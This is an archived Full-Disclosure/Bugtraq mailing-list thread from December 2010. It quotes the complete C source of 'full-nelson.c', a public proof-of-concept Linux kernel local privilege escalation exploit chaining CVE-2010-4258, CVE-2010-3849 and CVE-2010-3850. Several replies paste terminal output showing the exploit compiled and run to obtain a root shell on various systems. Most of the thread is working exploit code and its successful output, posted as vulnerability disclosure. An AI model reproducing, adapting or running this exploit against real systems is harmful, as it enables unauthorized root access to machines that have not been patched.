lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 8 Dec 2010 15:20:25 -0600
From: David Flores <dmousex@...il.com>
To: Benji <me@...ji.com>
Cc: leandro_lista@...tari.com.br, full-disclosure@...ts.grok.org.uk,
	bugtraq@...urityfocus.com
Subject: Re: Linux kernel exploit

:~$ gcc nel.c
:~$ ./a.out
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf9c47280
 [+] Resolved econet_ops to 0xf9c47360
 [+] Resolved commit_creds to 0xc01625a0
 [+] Resolved prepare_kernel_cred to 0xc01627a0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
root
# id
uid=0(root) gid=0(root)
# uname -a
Linux sistemas 2.6.31-22-generic #65-Ubuntu SMP Thu Sep 16 15:48:58 UTC 2010
i686 GNU/Linux
#

On Wed, Dec 8, 2010 at 14:56, Benji <me@...ji.com> wrote:

> working here aswell
>
> ownsthis@...al[~]$ uname -a
> FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23 08:30:18
> UTC 2010 root@...jir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC amd64
> ownsthis@...al[~]$ ./w00tw00t
>
> [*] Resolving kernel addresses...
> [+] Resolved econet_ioctl to 0xffffffffa0239510
> [+] Resolved econet_ops to 0xffffffffa0239600
> [+] Resolved commit_creds to 0xffffffff8108bd90
> [+] Resolved prepare_kernel_cred to 0xffffffff8108c170
> [*] Calculating target...
>
> [*] Failed to set Econet address.
> [*] Triggering payload...
> [*] Got root!
> # id
> uid=0(root) gid=0(root)
> #
>
> On Wed, Dec 8, 2010 at 7:15 PM, leandro_lista <
> leandro_lista@...tari.com.br> wrote:
>
>>  Works in kernel 2.6.32-24
>>
>>
>>
>> Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40
>> UTC 2010 x86_64 GNU/Linux
>>
>> indzin@...zin-desktop:~$ ./nels
>> [*] Resolving kernel addresses...
>> [+] Resolved econet_ioctl to 0xffffffffa0239510
>> [+] Resolved econet_ops to 0xffffffffa0239600
>> [+] Resolved commit_creds to 0xffffffff8108bd90
>> [+] Resolved prepare_kernel_cred to 0xffffffff8108c170
>> [*] Calculating target...
>>
>> [*] Failed to set Econet address.
>> [*] Triggering payload...
>> [*] Got root!
>> # id
>> uid=0(root) gid=0(root)
>> #
>>
>>
>> :)
>>
>>
>>
>>
>> -----Original Message-----
>> *From*: Cal Leeming [Simplicity Media Ltd] <
>> cal.leeming@...plicitymedialtd.co.uk<%22Cal%20Leeming%20%5bSimplicity%20Media%20Ltd%5d%22%20%3ccal.leeming@...plicitymedialtd.co.uk%3e>
>> >
>> *Reply-to*: cal.leeming@...plicitymedialtd.co.uk
>> *To*: Dan Rosenberg <dan.j.rosenberg@...il.com<Dan%20Rosenberg%20%3cdan.j.rosenberg@...il.com%3e>
>> >
>> *Cc*: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
>> *Subject*: Re: [Full-disclosure] Linux kernel exploit
>> *Date*: Tue, 07 Dec 2010 21:06:44 +0000
>>
>> Anyone tested this in sandbox yet?
>>
>> On 07/12/2010 20:25, Dan Rosenberg wrote:
>> > Hi all,
>> >
>> > I've included here a proof-of-concept local privilege escalation exploit
>> > for Linux.  Please read the header for an explanation of what's going
>> > on.  Without further ado, I present full-nelson.c:
>> >
>> > Happy hacking,
>> > Dan
>> >
>> >
>> > --snip--
>> >
>> > /*
>> >   * Linux Kernel<= 2.6.37 local privilege escalation
>> >   * by Dan Rosenberg
>> >   * @djrbliss on twitter
>> >   *
>> >   * Usage:
>> >   * gcc full-nelson.c -o full-nelson
>> >   * ./full-nelson
>> >   *
>> >   * This exploit leverages three vulnerabilities to get root, all of which were
>> >   * discovered by Nelson Elhage:
>> >   *
>> >   * CVE-2010-4258
>> >   * -------------
>> >   * This is the interesting one, and the reason I wrote this exploit.  If a
>> >   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
>> >   * word will be written to a user-specified pointer when that thread exits.
>> >   * This write is done using put_user(), which ensures the provided destination
>> >   * resides in valid userspace by invoking access_ok().  However, Nelson
>> >   * discovered that when the kernel performs an address limit override via
>> >   * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
>> >   * etc.), this override is not reverted before calling put_user() in the exit
>> >   * path, allowing a user to write a NULL word to an arbitrary kernel address.
>> >   * Note that this issue requires an additional vulnerability to trigger.
>> >   *
>> >   * CVE-2010-3849
>> >   * -------------
>> >   * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
>> >   * fairly benign as a local denial-of-service.  It's a perfect candidate to
>> >   * trigger the above issue, since it's reachable via sock_no_sendpage(), which
>> >   * subsequently calls sendmsg under KERNEL_DS.
>> >   *
>> >   * CVE-2010-3850
>> >   * -------------
>> >   * I wouldn't be able to reach the NULL pointer dereference and trigger the
>> >   * OOPS if users weren't able to assign Econet addresses to arbitrary
>> >   * interfaces due to a missing capabilities check.
>> >   *
>> >   * In the interest of public safety, this exploit was specifically designed to
>> >   * be limited:
>> >   *
>> >   *  * The particular symbols I resolve are not exported on Slackware or Debian
>> >   *  * Red Hat does not support Econet by default
>> >   *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
>> >   *    Debian
>> >   *
>> >   * However, the important issue, CVE-2010-4258, affects everyone, and it would
>> >   * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>> >   * more sophisticated version of this that doesn't have the roadblocks I put in
>> >   * to prevent abuse by script kiddies.
>> >   *
>> >   * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
>> >   *
>> >   * NOTE: the exploit process will deadlock and stay in a zombie state after you
>> >   * exit your root shell because the Econet thread OOPSes while holding the
>> >   * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
>> >   *
>> >   * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
>> >   */
>> >
>> > #include<stdio.h>
>> > #include<sys/socket.h>
>> > #include<fcntl.h>
>> > #include<sys/ioctl.h>
>> > #include<string.h>
>> > #include<net/if.h>
>> > #include<sched.h>
>> > #include<stdlib.h>
>> > #include<signal.h>
>> > #include<sys/utsname.h>
>> > #include<sys/mman.h>
>> > #include<unistd.h>
>> >
>> > /* How many bytes should we clear in our
>> >   * function pointer to put it into userspace? */
>> > #ifdef __x86_64__
>> > #define SHIFT 24
>> > #define OFFSET 3
>> > #else
>> > #define SHIFT 8
>> > #define OFFSET 1
>> > #endif
>> >
>> > /* thanks spender... */
>> > unsigned long get_kernel_sym(char *name)
>> > {
>> > 	FILE *f;
>> > 	unsigned long addr;
>> > 	char dummy;
>> > 	char sname[512];
>> > 	struct utsname ver;
>> > 	int ret;
>> > 	int rep = 0;
>> > 	int oldstyle = 0;
>> >
>> > 	f = fopen("/proc/kallsyms", "r");
>> > 	if (f == NULL) {
>> > 		f = fopen("/proc/ksyms", "r");
>> > 		if (f == NULL)
>> > 			goto fallback;
>> > 		oldstyle = 1;
>> > 	}
>> >
>> > repeat:
>> > 	ret = 0;
>> > 	while(ret != EOF) {
>> > 		if (!oldstyle)
>> > 			ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, sname);
>> > 		else {
>> > 			ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
>> > 			if (ret == 2) {
>> > 				char *p;
>> > 				if (strstr(sname, "_O/") || strstr(sname, "_S."))
>> > 					continue;
>> > 				p = strrchr(sname, '_');
>> > 				if (p>  ((char *)sname + 5)&&  !strncmp(p - 3, "smp", 3)) {
>> > 					p = p - 4;
>> > 					while (p>  (char *)sname&&  *(p - 1) == '_')
>> > 						p--;
>> > 					*p = '\0';
>> > 				}
>> > 			}
>> > 		}
>> > 		if (ret == 0) {
>> > 			fscanf(f, "%s\n", sname);
>> > 			continue;
>> > 		}
>> > 		if (!strcmp(name, sname)) {
>> > 			fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
>> > 			fclose(f);
>> > 			return addr;
>> > 		}
>> > 	}
>> >
>> > 	fclose(f);
>> > 	if (rep)
>> > 		return 0;
>> > fallback:
>> > 	uname(&ver);
>> > 	if (strncmp(ver.release, "2.6", 3))
>> > 		oldstyle = 1;
>> > 	sprintf(sname, "/boot/System.map-%s", ver.release);
>> > 	f = fopen(sname, "r");
>> > 	if (f == NULL)
>> > 		return 0;
>> > 	rep = 1;
>> > 	goto repeat;
>> > }
>> >
>> > typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
>> > typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
>> > _commit_creds commit_creds;
>> > _prepare_kernel_cred prepare_kernel_cred;
>> >
>> > static int __attribute__((regparm(3)))
>> > getroot(void * file, void * vma)
>> > {
>> >
>> >          commit_creds(prepare_kernel_cred(0));
>> >          return -1;
>> >
>> > }
>> >
>> > /* Why do I do this?  Because on x86-64, the address of
>> >   * commit_creds and prepare_kernel_cred are loaded relative
>> >   * to rip, which means I can't just copy the above payload
>> >   * into my landing area. */
>> > void __attribute__((regparm(3)))
>> > trampoline()
>> > {
>> >
>> > #ifdef __x86_64__
>> > 	asm("mov $getroot, %rax; call *%rax;");
>> > #else
>> > 	asm("mov $getroot, %eax; call *%eax;");
>> > #endif
>> >
>> > }
>> >
>> > /* Triggers a NULL pointer dereference in econet_sendmsg
>> >   * via sock_no_sendpage, so it's under KERNEL_DS */
>> > int trigger(int * fildes)
>> > {
>> > 	int ret;
>> > 	struct ifreq ifr;
>> >
>> > 	memset(&ifr, 0, sizeof(ifr));
>> > 	strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
>> >
>> > 	ret = ioctl(fildes[2], SIOCSIFADDR,&ifr);
>> >
>> > 	if(ret<  0) {
>> > 		printf("[*] Failed to set Econet address.\n");
>> > 		return -1;
>> > 	}
>> >
>> > 	splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
>> > 	splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
>> >
>> > 	/* Shouldn't get here... */
>> > 	exit(0);
>> > }
>> >
>> > int main(int argc, char * argv[])
>> > {
>> > 	unsigned long econet_ops, econet_ioctl, target, landing;
>> > 	int fildes[4], pid;
>> > 	void * newstack, * payload;
>> >
>> > 	/* Create file descriptors now so there are two
>> > 	   references to them after cloning...otherwise
>> > 	   the child will never return because it
>> > 	   deadlocks when trying to unlock various
>> > 	   mutexes after OOPSing */
>> > 	pipe(fildes);
>> > 	fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
>> > 	fildes[3] = open("/dev/zero", O_RDONLY);
>> >
>> > 	if(fildes[0]<  0 || fildes[1]<  0 || fildes[2]<  0 || fildes[3]<  0) {
>> > 		printf("[*] Failed to open file descriptors.\n");
>> > 		return -1;
>> > 	}
>> >
>> > 	/* Resolve addresses of relevant symbols */
>> > 	printf("[*] Resolving kernel addresses...\n");
>> > 	econet_ioctl = get_kernel_sym("econet_ioctl");
>> > 	econet_ops = get_kernel_sym("econet_ops");
>> > 	commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
>> > 	prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
>> >
>> > 	if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
>> > 		printf("[*] Failed to resolve kernel symbols.\n");
>> > 		return -1;
>> > 	}
>> >
>> > 	if(!(newstack = malloc(65536))) {
>> > 		printf("[*] Failed to allocate memory.\n");
>> > 		return -1;
>> > 	}
>> >
>> > 	printf("[*] Calculating target...\n");
>> > 	target = econet_ops + 10 * sizeof(void *) - OFFSET;
>> >
>> > 	/* Clear the higher bits */
>> > 	landing = econet_ioctl<<  SHIFT>>  SHIFT;
>> >
>> > 	payload = mmap((void *)(landing&  ~0xfff), 2 * 4096,
>> > 		       PROT_READ | PROT_WRITE | PROT_EXEC,
>> > 		       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
>> >
>> > 	if ((long)payload == -1) {
>> > 		printf("[*] Failed to mmap() at target address.\n");
>> > 		return -1;
>> > 	}
>> >
>> > 	memcpy((void *)landing,&trampoline, 1024);
>> >
>> > 	clone((int (*)(void *))trigger,
>> > 	      (void *)((unsigned long)newstack + 65536),
>> > 	      CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
>> > 	&fildes, NULL, NULL, target);
>> >
>> > 	sleep(1);
>> >
>> > 	printf("[*] Triggering payload...\n");
>> > 	ioctl(fildes[2], 0, NULL);
>> >
>> > 	if(getuid()) {
>> > 		printf("[*] Exploit failed to get root.\n");
>> > 		return -1;
>> > 	}
>> >
>> > 	printf("[*] Got root!\n");
>> > 	execl("/bin/sh", "/bin/sh", NULL);
>> > }
>> >
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
David Flores Velázquez
Email: dmousex@...il.com

 <http://twitter.com/dmouse>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ